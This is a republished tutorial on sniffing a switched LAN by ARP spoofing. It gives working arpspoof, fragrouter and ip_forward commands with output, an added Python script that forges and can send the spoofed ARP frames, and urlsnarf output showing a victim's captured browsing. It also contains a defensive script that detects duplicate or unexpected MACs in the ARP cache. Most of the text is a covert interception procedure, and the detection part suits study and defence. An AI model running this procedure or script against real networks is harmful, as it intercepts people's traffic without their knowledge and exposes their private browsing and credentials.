Implementing a sniffer with ARP spoofing
Transferred from: Alibaba Cloud security online
Normally, hosts on a LAN reach the Internet through a gateway, and that LAN is almost always switched. In a switched environment a sniffer such as NetXRay or NAI Sniffer only sees packets addressed to your own host: the switch delivers each frame only to the port of its destination MAC, so the traffic of other hosts never reaches you.
With ARP spoofing, however, we can still sniff it.
ARP is the protocol that resolves an IP address to a MAC address, and delivery within a LAN is based on MAC addresses. ARP has no authentication: a host updates its ARP cache from whatever reply it receives, and that is what the attack exploits.
For example:
In a LAN, 192.168.0.24 and 192.168.0.29 both reach the Internet through the gateway 192.168.0.1. If the attacker's machine is 192.168.0.24 and wants to listen in on the traffic of 192.168.0.29, ARP spoofing works like this:
1. Tell 192.168.0.29 that the MAC address of the gateway 192.168.0.1 is that of 192.168.0.24.
2. Tell 192.168.0.1 that the MAC address of 192.168.0.29 is that of 192.168.0.24.
Now every packet between 192.168.0.29 and 192.168.0.1 is delivered to 192.168.0.24, the attacker's machine, which can therefore see the whole session. There is a problem, though: 192.168.0.29 finds it can no longer reach the Internet, because everything it sends to 192.168.0.1 is received by 192.168.0.24 and never reaches the gateway.
The fix is to turn on packet forwarding on 192.168.0.24, so that packets received from 192.168.0.29 are passed on to 192.168.0.1 and packets received from 192.168.0.1 are passed on to 192.168.0.29. Then 192.168.0.29 keeps working normally and never realises it is being monitored.
Concrete implementation:
1. Poison 192.168.0.29: tell it that the MAC address of the gateway 192.168.0.1 is the attacker's own (192.168.0.24). With arpspoof, -t names the host whose ARP cache is poisoned and the last argument is the host to impersonate.
[root@linux dsniff-2.3]# ./arpspoof -i eth0 -t 192.168.0.29 192.168.0.1
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:0:21:0:0:18 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:0:21:0:0:18
......................................
Each line is one forged frame: source MAC, destination MAC, EtherType 0806 (ARP), frame length 42 bytes, and the claim it carries. 0:50:56:40:7:71 is the attacker, 0:0:86:61:6b:4e is 192.168.0.29 and 0:0:21:0:0:18 is the real MAC of the gateway. arpspoof keeps re-sending the forged reply every couple of seconds so the victim's cache never recovers; the line carrying the gateway's real MAC is the corrective reply arpspoof sends when it is stopped, which restores the victim's cache.
From this point 192.168.0.29 is being spoofed.
2. Poison 192.168.0.1: tell the gateway that the MAC address of 192.168.0.29 is the attacker's own (192.168.0.24).
[root@linux dsniff-2.3]# ./arpspoof -i eth0 -t 192.168.0.1 192.168.0.29
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
Again the last three lines, which carry the real MAC of 192.168.0.29, are the corrective replies arpspoof sends to the gateway on exit. With both steps running, both directions of the path between 192.168.0.29 and the gateway pass through the attacker; in practice both arpspoof instances are left running for as long as the sniffing lasts, since the caches would otherwise heal on their own.
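What the two arpspoof runs actually put on the wire is easier to see by building the frames by hand. The following is an added example, not code from the original article or from dsniff: it constructs the 42-byte Ethernet/ARP replies printed in the arpspoof output above (steps 1 and 2, and the corrective replies sent on exit) and decodes them in the same format. The MAC and IP addresses are the article's; send_frame() is an optional helper that needs Linux and root (CAP_NET_RAW) and is not called by the offline part.

```python
"""Build and decode the ARP replies that arpspoof puts on the wire.

Added example (not the article's or dsniff's code). Addresses below are the
ones in the article's arpspoof output.
"""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

ATTACKER_MAC = "0:50:56:40:7:71"                      # 192.168.0.24
VICTIM_IP, VICTIM_MAC = "192.168.0.29", "0:0:86:61:6b:4e"
GATEWAY_IP, GATEWAY_MAC = "192.168.0.1", "0:0:21:0:0:18"


def mac_bytes(mac):
    """'0:50:56:40:7:71' or '00-50-56-40-07-71' -> 6 raw bytes."""
    return bytes(int(part, 16) for part in mac.replace("-", ":").split(":"))


def mac_str(raw):
    """6 raw bytes -> the unpadded form arpspoof and tcpdump print."""
    return ":".join("%x" % b for b in raw)


def build_arp_reply(sender_ip, sender_mac, target_ip, target_mac):
    """Ethernet frame carrying an unsolicited ARP reply.

    The reply asserts "sender_ip is-at sender_mac" and is unicast to
    target_mac, so that target_ip overwrites its cache entry for sender_ip.
    Nothing in ARP lets the target verify the claim.
    """
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1,                       # hardware type: Ethernet
        0x0800,                  # protocol type: IPv4
        6, 4,                    # hardware / protocol address lengths
        ARP_REPLY,
        mac_bytes(sender_mac), socket.inet_aton(sender_ip),
        mac_bytes(target_mac), socket.inet_aton(target_ip),
    )
    return eth + arp             # 14 + 28 = 42 bytes: the "42" in arpspoof's output


def describe(frame):
    """Render a frame the way arpspoof logs what it sends."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    _, _, _, _, op, sha, spa, _tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    head = "%s %s %04x %d: " % (mac_str(src), mac_str(dst), ethertype, len(frame))
    if op == ARP_REPLY:
        return head + "arp reply %s is-at %s" % (socket.inet_ntoa(spa), mac_str(sha))
    return head + "arp who-has %s tell %s" % (socket.inet_ntoa(tpa), socket.inet_ntoa(spa))


def spoof_frames(attacker_mac=ATTACKER_MAC):
    """One round of the attack: step 1 (poison the victim) and step 2 (poison the gateway)."""
    to_victim = build_arp_reply(GATEWAY_IP, attacker_mac, VICTIM_IP, VICTIM_MAC)
    to_gateway = build_arp_reply(VICTIM_IP, attacker_mac, GATEWAY_IP, GATEWAY_MAC)
    return to_victim, to_gateway


def restore_frames():
    """What arpspoof sends when it exits: the true mappings, so both caches heal."""
    to_victim = build_arp_reply(GATEWAY_IP, GATEWAY_MAC, VICTIM_IP, VICTIM_MAC)
    to_gateway = build_arp_reply(VICTIM_IP, VICTIM_MAC, GATEWAY_IP, GATEWAY_MAC)
    return to_victim, to_gateway


def send_frame(iface, frame):
    """Put a frame on the wire. Linux only; needs root or CAP_NET_RAW. Not used offline."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    for f in spoof_frames() + restore_frames():
        print(describe(f))
```

Running the script prints the four frames in exactly the format of the arpspoof listings above; to reproduce the attack itself, the two spoof frames would have to be re-sent every couple of seconds with send_frame(), and the restore frames sent once at the end.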
In fact, 192.168.0.29 could notice the spoofing at this point. Running arp -a at the command prompt shows:
C:\winnt> arp -a
Interface: 192.168.0.29 on Interface 0x1000003
  Internet Address      Physical Address      Type
  192.168.0.1           00-50-56-40-07-71     dynamic
  192.168.0.24          00-50-56-40-07-71     dynamic
Two IP addresses with exactly the same MAC address! But few users ever look :-).
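The duplicate-MAC check above is the one a defender can automate. The following is an added example, not from the original article: it parses the Windows arp -a listing shown above and the equivalent Linux ip neigh output, groups entries by MAC, and reports any unicast MAC that more than one IP resolves to, plus a specific check on the default gateway's entry against an expected MAC (here the gateway's real MAC from the arpspoof output). Both cache listings are constructed; the Windows one extends the article's listing with the static broadcast and multicast rows that newer Windows versions print, because those share MACs legitimately and must not be reported.

```python
"""Spot ARP spoofing from a host's own ARP cache (added example, not the article's code)."""
import re
from collections import defaultdict

# Constructed: the article's arp -a listing plus static rows newer Windows prints.
WINDOWS_ARP_A = """\
Interface: 192.168.0.29 on Interface 0x1000003
  Internet Address      Physical Address      Type
  192.168.0.1           00-50-56-40-07-71     dynamic
  192.168.0.24          00-50-56-40-07-71     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed: the same situation as seen from a Linux victim with 'ip neigh show'.
LINUX_IP_NEIGH = """\
192.168.0.1 dev eth0 lladdr 00:50:56:40:07:71 REACHABLE
192.168.0.24 dev eth0 lladdr 00:50:56:40:07:71 STALE
192.168.0.7 dev eth0 lladdr 00:0c:29:3a:7b:9d DELAY
192.168.0.50 dev eth0 FAILED
"""

# One pattern covers both formats: "ip  mac" (Windows) and "ip dev X lladdr mac" (Linux).
ENTRY_RE = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?:dev\s+\S+\s+lladdr\s+)?"
    r"(?P<mac>(?:[0-9A-Fa-f]{1,2}[:-]){5}[0-9A-Fa-f]{1,2})\b"
)


def normalize_mac(mac):
    """Accept 0:50:56:40:7:71, 00-50-56-40-07-71 or 00:50:56:40:07:71; return the last form."""
    return ":".join("%02x" % int(p, 16) for p in mac.replace("-", ":").split(":"))


def is_unicast(mac):
    """Broadcast and multicast MACs have the low bit of the first octet set."""
    return int(mac.split(":")[0], 16) & 1 == 0


def parse_arp_cache(text):
    """{ip: normalized mac} from either 'arp -a' or 'ip neigh' output; entries without a MAC are skipped."""
    entries = {}
    for line in text.splitlines():
        m = ENTRY_RE.search(line)
        if m:
            entries[m.group("ip")] = normalize_mac(m.group("mac"))
    return entries


def find_shared_macs(entries):
    """{mac: [ips]} for every unicast MAC that two or more IPs resolve to."""
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        if is_unicast(mac):
            by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def check_gateway(entries, gateway_ip, expected_mac=None):
    """Findings about the gateway's cache entry; an empty list means nothing suspicious."""
    findings = []
    mac = entries.get(gateway_ip)
    if mac is None:
        return ["gateway %s has no ARP entry" % gateway_ip]
    if expected_mac is not None and mac != normalize_mac(expected_mac):
        findings.append("gateway %s resolves to %s, expected %s"
                        % (gateway_ip, mac, normalize_mac(expected_mac)))
    others = sorted(ip for ip, m in entries.items() if m == mac and ip != gateway_ip)
    if others:
        findings.append("gateway MAC %s is also claimed by %s" % (mac, ", ".join(others)))
    return findings


if __name__ == "__main__":
    for name, text in (("arp -a", WINDOWS_ARP_A), ("ip neigh", LINUX_IP_NEIGH)):
        cache = parse_arp_cache(text)
        print(name, find_shared_macs(cache), check_gateway(cache, "192.168.0.1", "0:0:21:0:0:18"))
```

Pinning the gateway's expected MAC is the stronger check: a single-target attack that poisons only the gateway mapping leaves no duplicate in the victim's cache, so a shared-MAC scan alone would miss it, while a static ARP entry for the gateway both detects and blocks it.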
3. Forward the packets
[root@linux fragrouter-1.6]# ./fragrouter -B1
fragrouter: base-1: normal IP forwarding
fragrouter -B1 forwards the intercepted packets in user space. The alternative is to let the kernel do it, which is what the ip_forward switch enables:
[root@linux /proc]# echo 1 > /proc/sys/net/ipv4/ip_forward
One of the two is enough (arpspoof's own documentation asks for kernel IP forwarding or a userland program such as fragrouter that does the same). Without forwarding of some kind, 192.168.0.29 loses its connection the moment the spoofing starts, which is the quickest way to get noticed.
Everything is in place; now start sniffing.
For example, to see which web pages 192.168.0.29 visits:
[root@linux dsniff-2.3]# ./urlsnarf
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
kitty - - [18/May/2002:20:02:25 +1100] "GET http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7 HTTP/1.1" - - "http://www.google.com/search?hl=zh-CN&ie=utf8&oe=utf8&q=fdfds&btnG=Google%E6%90%9C%E7%B4%A2&lr=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
kitty - - [18/May/2002:20:02:28 +1100] "GET http://www.ezboard.com/ztyles/default.css HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
kitty - - [18/May/2002:20:02:29 +1100] "GET http://www1.ezboard.com/spch.js?customerid=1147458082 HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
urlsnarf prints one line per HTTP request in Common Log Format: client (here resolved to the hostname kitty), timestamp, request line, referer and user agent, so the victim's whole browsing path, including the Google query that led there, is visible.
A lot more can be learned in the same way: the other tools in the dsniff suite work on the same forwarded traffic ......... :-)
The whole procedure is carried out on Linux. All the tools used can be downloaded from http://www.piaoye.net/downsniffer/arpsniffer.zip (2.98 MB).